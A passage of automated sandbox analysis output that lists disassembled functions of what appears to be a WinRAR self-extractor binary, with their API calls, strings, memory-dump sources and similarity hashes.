Part of subcall function 00DD05DA: _wcslen.LIBCMT ref: 00DD05E0

Strings

x%u, xrefs: 00DC26FD
xc%u, xrefs: 00DC275A
;%u, xrefs: 00DC2523

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: __vswprintf_c_l_swprintf_wcslen
String ID: ;%u$x%u$xc%u
API String ID: 3053425827-2277559157
Opcode ID: 72b6b53cad16c74ccb29b4d605bf5be4565feafa66621c88c7781aad456b9df8
Instruction ID: 0de6365582996127529808a854043880437fc66560c7a0b5454ab1e706c0446b
Opcode Fuzzy Hash: 72b6b53cad16c74ccb29b4d605bf5be4565feafa66621c88c7781aad456b9df8
Instruction Fuzzy Hash: 6FF117706083829BDB25EB2885A5FFE77959F94300F0C056DFDCA9B283CB649949C772

Function 00DD9CFE Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 183COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00DD9D0A

Strings

>, xrefs: 00DD9D4B
<style>, xrefs: 00DD9E30
<br>, xrefs: 00DD9DFE
</style>, xrefs: 00DD9E52
</p>, xrefs: 00DD9DE8

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: _wcslen
String ID: </p>$</style>$<br>$<style>$>
API String ID: 176396367-3568243669
Opcode ID: 1cdf0c9f40c33788be2a54a34442935a50f70e2a066aa705a97f3ecd9e1f7f8e
Instruction ID: 807e8c0347889024a6571634c784706bebc1008a33d9dfe349f1397ec4924812
Opcode Fuzzy Hash: 1cdf0c9f40c33788be2a54a34442935a50f70e2a066aa705a97f3ecd9e1f7f8e
Instruction Fuzzy Hash: 4C51C46674132295DB309A259C31776F3E2DFA5750F6D442BF9C18B3C0FAA78D818271

Function 00DEF68D Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00DEFE02,00000000,00000000,00000000,00000000,00000000,?), ref: 00DEF6CF
__fassign.LIBCMT ref: 00DEF74A
__fassign.LIBCMT ref: 00DEF765
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00DEF78B
WriteFile.KERNEL32(?,00000000,00000000,00DEFE02,00000000,?,?,?,?,?,?,?,?,?,00DEFE02,00000000), ref: 00DEF7AA
WriteFile.KERNEL32(?,00000000,00000001,00DEFE02,00000000,?,?,?,?,?,?,?,?,?,00DEFE02,00000000), ref: 00DEF7E3

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 0cf8c1aa19c4d18ab735314ce79fb15a375b95505a067ebca6a3abcd6489779f
Instruction ID: 86e633eb7231f5cb7556b97e2d4ddb8ec79aa4fc8c97227cb962b41802bfc2c8
Opcode Fuzzy Hash: 0cf8c1aa19c4d18ab735314ce79fb15a375b95505a067ebca6a3abcd6489779f
Instruction Fuzzy Hash: 595193B1900249AFDB10DFA9DC95AEEBBF8EF09300F14416AE555E7251D670AA41CBB0

Function 00DE2900 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00DE2937
___except_validate_context_record.LIBVCRUNTIME ref: 00DE293F
_ValidateLocalCookies.LIBCMT ref: 00DE29C8
__IsNonwritableInCurrentImage.LIBCMT ref: 00DE29F3
_ValidateLocalCookies.LIBCMT ref: 00DE2A48

Strings

csm, xrefs: 00DE29DD

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: b8b42a487da02cc6d29d8e18d3e58e9cc16d970a0a43c2f0761f1c3edf054f4b
Instruction ID: 72d38a8514dd9f8e7e3e6f3700f43179d83d966720f62f91f492dfba2658e007
Opcode Fuzzy Hash: b8b42a487da02cc6d29d8e18d3e58e9cc16d970a0a43c2f0761f1c3edf054f4b
Instruction Fuzzy Hash: 1C41A530A002889FCF10EF6ACC85ABE7BA9EF44314F148165E8159B352D771DA45CFB1

Function 00DD9ED5 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114COMMON

Download Yara Rule

APIs

ShowWindow.USER32(?,00000000), ref: 00DD9EEE
GetWindowRect.USER32(?,00000000), ref: 00DD9F44
ShowWindow.USER32(?,00000005,00000000), ref: 00DD9FDB
SetWindowTextW.USER32(?,00000000), ref: 00DD9FE3
ShowWindow.USER32(00000000,00000005), ref: 00DD9FF9

Strings

RarHtmlClassName, xrefs: 00DD9FA5

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: Window$Show$RectText
String ID: RarHtmlClassName
API String ID: 3937224194-1658105358
Opcode ID: 130960791a7b7e289a238b3c5a9b5ad3e6d05187f7f4a4a1c47d1d8e36f4274a
Instruction ID: e20ad74bf731d5236cf323395f11a740038733e0ea256b42a8378ee29d49d5d1
Opcode Fuzzy Hash: 130960791a7b7e289a238b3c5a9b5ad3e6d05187f7f4a4a1c47d1d8e36f4274a
Instruction Fuzzy Hash: C041C032005210AFCB216F79DC48B2BBBA8FF48701F04855AF949AA256DB38D919CF75

Function 00DD9955 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00DD995E
_wcslen.LIBCMT ref: 00DD9993

Strings

<style>body{font-family:"Arial";font-size:12;}</style>, xrefs: 00DD9987
, xrefs: 00DD99B0
 , xrefs: 00DD9A21
<br>, xrefs: 00DD99DF

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: _wcslen
String ID: $ $<br>$<style>body{font-family:"Arial";font-size:12;}</style>
API String ID: 176396367-3743748572
Opcode ID: ae1015308f6451f978b8e6dc5633b65b53dc63c56ec4222f719729fa9e227148
Instruction ID: e9cccf581a117218250db90f79446af22e90922b1f88f9ec3faec23dad8aacee
Opcode Fuzzy Hash: ae1015308f6451f978b8e6dc5633b65b53dc63c56ec4222f719729fa9e227148
Instruction Fuzzy Hash: BD317D7364434556DA30BB959C62B7BF3A4EB90720F64841FF58687380FB62ED4583B1

Function 00DEC8A4 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00DEC868: _free.LIBCMT ref: 00DEC891

_free.LIBCMT ref: 00DEC8F2

Part of subcall function 00DE8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00DEC896,?,00000000,?,00000000,?,00DEC8BD,?,00000007,?,?,00DECCBA,?), ref: 00DE8DE2
Part of subcall function 00DE8DCC: GetLastError.KERNEL32(?,?,00DEC896,?,00000000,?,00000000,?,00DEC8BD,?,00000007,?,?,00DECCBA,?,?), ref: 00DE8DF4

_free.LIBCMT ref: 00DEC8FD
_free.LIBCMT ref: 00DEC908
_free.LIBCMT ref: 00DEC95C
_free.LIBCMT ref: 00DEC967
_free.LIBCMT ref: 00DEC972
_free.LIBCMT ref: 00DEC97D

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
Instruction ID: d2babafcde137ac9f06edb610b8f03bbcc56b61503d2849cc554a833b46dbb4f
Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
Instruction Fuzzy Hash: AC112171590B84AAE520B7B3CD47FCB7BACDF04B00FC45C15B29D66092DA75B5069770

Function 00DDE5EE Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,00DDE669,00DDE5CC,00DDE86D), ref: 00DDE605
GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00DDE61B
GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00DDE630

Strings

AcquireSRWLockExclusive, xrefs: 00DDE615
KERNEL32.DLL, xrefs: 00DDE600
ReleaseSRWLockExclusive, xrefs: 00DDE625

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
API String ID: 667068680-1718035505
Opcode ID: cea3023e5591f86780d39b7f5835d4a89c81ff300a431c44445532a93e79b2fd
Instruction ID: 91f80e995f528b56dbc0695435b7575cb52c1aa629d901daa530798d98b0101c
Opcode Fuzzy Hash: cea3023e5591f86780d39b7f5835d4a89c81ff300a431c44445532a93e79b2fd
Instruction Fuzzy Hash: 29F0C2357812225F0F216E756C8557663C86A3575530A8C7BDA05EB300EB10CD599AF0

Function 00DD146A Relevance: 9.1, APIs: 6, Instructions: 98timeCOMMON

Download Yara Rule

APIs

SystemTimeToFileTime.KERNEL32(?,?), ref: 00DD14C2

Part of subcall function 00DCB146: GetVersionExW.KERNEL32(?), ref: 00DCB16B

LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00DD14E6
FileTimeToSystemTime.KERNEL32(?,?), ref: 00DD1500
TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00DD1513
SystemTimeToFileTime.KERNEL32(?,?), ref: 00DD1523
SystemTimeToFileTime.KERNEL32(?,?), ref: 00DD1533

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion
String ID:
API String ID: 2092733347-0
Opcode ID: 26ca3931138895103146c4450917ee904e22170023f5d60d8a60900ae71730cc
Instruction ID: 301202aa1e87a92b255c7427f524935d94baf850d56aa14202d6a3045f3bb21f
Opcode Fuzzy Hash: 26ca3931138895103146c4450917ee904e22170023f5d60d8a60900ae71730cc
Instruction Fuzzy Hash: 8B31C579108346ABC704DFA8D88499BB7F8FF98714F048A1AF995C3310E734D549CBA6

Function 00DE2AFA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00DE2AF1,00DE02FC,00DDFA34), ref: 00DE2B08
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00DE2B16
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00DE2B2F
SetLastError.KERNEL32(00000000,00DE2AF1,00DE02FC,00DDFA34), ref: 00DE2B81

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 9c4eb22e3afc0ad93d4c4ff91932ce35030e94335db618cbfbb5b7a118b8c788
Instruction ID: f8f15960823d7d8ce1687ae1cbb6fddcf075c9f0250577920c463b29fce1120c
Opcode Fuzzy Hash: 9c4eb22e3afc0ad93d4c4ff91932ce35030e94335db618cbfbb5b7a118b8c788
Instruction Fuzzy Hash: 700124321083516EE6243F777C899362B4EEB41774764433AF010962F4EF919D00D134

Function 00DE97E5 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00E01030,00DE4674,00E01030,?,?,00DE3F73,00000050,?,00E01030,00000200), ref: 00DE97E9
_free.LIBCMT ref: 00DE981C
_free.LIBCMT ref: 00DE9844
SetLastError.KERNEL32(00000000,?,00E01030,00000200), ref: 00DE9851
SetLastError.KERNEL32(00000000,?,00E01030,00000200), ref: 00DE985D
_abort.LIBCMT ref: 00DE9863

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 154ee78fbb4fae52df9ef95850b9bb27bda5f80568e372beb72c07749c42c8f6
Instruction ID: d015b5c3f7a3944145747f16823d123427968b5eff514d6540b5b74da9b5fad3
Opcode Fuzzy Hash: 154ee78fbb4fae52df9ef95850b9bb27bda5f80568e372beb72c07749c42c8f6
Instruction Fuzzy Hash: 6FF028361017C166C71237377CAAB2BAA65CFD2B70F2D4029F618D23F2EE20C8018175

Function 00DDDC3B Relevance: 9.0, APIs: 6, Instructions: 42windowsynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,0000000A), ref: 00DDDC47
PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00DDDC61
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00DDDC72
TranslateMessage.USER32(?), ref: 00DDDC7C
DispatchMessageW.USER32(?), ref: 00DDDC86
WaitForSingleObject.KERNEL32(?,0000000A), ref: 00DDDC91

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: Message$ObjectSingleWait$DispatchPeekTranslate
String ID:
API String ID: 2148572870-0
Opcode ID: 0fe15729aaffddf96b612f86806cbb92bea918a1f838424afa273c38dd7445b4
Instruction ID: 72f2f4a23110cbc089f7255c18e2b32e751952feb2558c6e035416c9ea0b94a0
Opcode Fuzzy Hash: 0fe15729aaffddf96b612f86806cbb92bea918a1f838424afa273c38dd7445b4
Instruction Fuzzy Hash: 44F03C72A01219BBCF206BA6DC4CDDB7F7DEF45791F044012B50AE2155D678864ACBB0

Function 00DCC0C5 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 148COMMON

Download Yara Rule

APIs

Part of subcall function 00DD05DA: _wcslen.LIBCMT ref: 00DD05E0

Part of subcall function 00DCB92D: _wcsrchr.LIBVCRUNTIME ref: 00DCB944

_wcslen.LIBCMT ref: 00DCC197
_wcslen.LIBCMT ref: 00DCC1DF

Strings

.exe, xrefs: 00DCC10B
.rar, xrefs: 00DCC0E1, 00DCC134
.sfx, xrefs: 00DCC11A

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: _wcslen$_wcsrchr
String ID: .exe$.rar$.sfx
API String ID: 3513545583-31770016
Opcode ID: 0ab03374bc9d513b9e79f5ea42f717412350ef9cf90813ffff17a67050c408ea
Instruction ID: 63eb2edb9340b080f9c20198d4e99f51b56ec174bcf2d59c039ab401caeeae98
Opcode Fuzzy Hash: 0ab03374bc9d513b9e79f5ea42f717412350ef9cf90813ffff17a67050c408ea
Instruction Fuzzy Hash: CE41362656035396C732AF348802F7AB3A4EF41714F1C654EFBC96B181EB608D81D3B5

Function 00DDCE87 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 133COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000800,?), ref: 00DDCE9D

Part of subcall function 00DCB690: _wcslen.LIBCMT ref: 00DCB696

_swprintf.LIBCMT ref: 00DDCED1

Part of subcall function 00DC4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00DC40A5

SetDlgItemTextW.USER32(?,00000066,00E0946A), ref: 00DDCEF1
EndDialog.USER32(?,00000001), ref: 00DDCFFE

Strings

%s%s%u, xrefs: 00DDCEC6

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcslen
String ID: %s%s%u
API String ID: 110358324-1360425832
Opcode ID: e3ec7244fa9b5611ebb2e35f992fa3edb8ba64fd0797a7740d89073599645317
Instruction ID: ff4011fde596e1707e1039aa26c7a45cf7790b5e840672253389639d9d1b7f36
Opcode Fuzzy Hash: e3ec7244fa9b5611ebb2e35f992fa3edb8ba64fd0797a7740d89073599645317
Instruction Fuzzy Hash: 754194B1900259AADF219B60CC85FEE77BDEB05301F4480A7F909E7241EE719A84CF71

Function 00DCBB03 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 127COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00DCBB27
GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,00DCA275,?,?,00000800,?,00DCA23A,?,00DC755C), ref: 00DCBBC5
_wcslen.LIBCMT ref: 00DCBC3B

Strings

\\?\, xrefs: 00DCBB52, 00DCBB99, 00DCBBF7, 00DCBC4E
UNC, xrefs: 00DCBBA7

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: _wcslen$CurrentDirectory
String ID: UNC$\\?\
API String ID: 3341907918-253988292
Opcode ID: adfbf808dd0bae3cba31114ed1a37cf1e06083552be32ba2cb0b30df77046952
Instruction ID: 6573254bb5fdc82a671c85a624e80eff14f6cdad59f2044392b3ed613d4e616d
Opcode Fuzzy Hash: adfbf808dd0bae3cba31114ed1a37cf1e06083552be32ba2cb0b30df77046952
Instruction Fuzzy Hash: 6941B23144025AAACF21AF70CD43FEA77A9EF413A1F04852BF954A3151DB75DE908AB0

Function 00DDB270 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 62COMMON

Download Yara Rule

APIs

Part of subcall function 00DC1316: GetDlgItem.USER32(00000000,00003021), ref: 00DC135A
Part of subcall function 00DC1316: SetWindowTextW.USER32(00000000,00DF35F4), ref: 00DC1370

EndDialog.USER32(?,00000001), ref: 00DDB2BE
GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 00DDB2D6
SetDlgItemTextW.USER32(?,00000067,?), ref: 00DDB304

Strings

xz, xrefs: 00DDB2E2
GETPASSWORD1, xrefs: 00DDB289

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
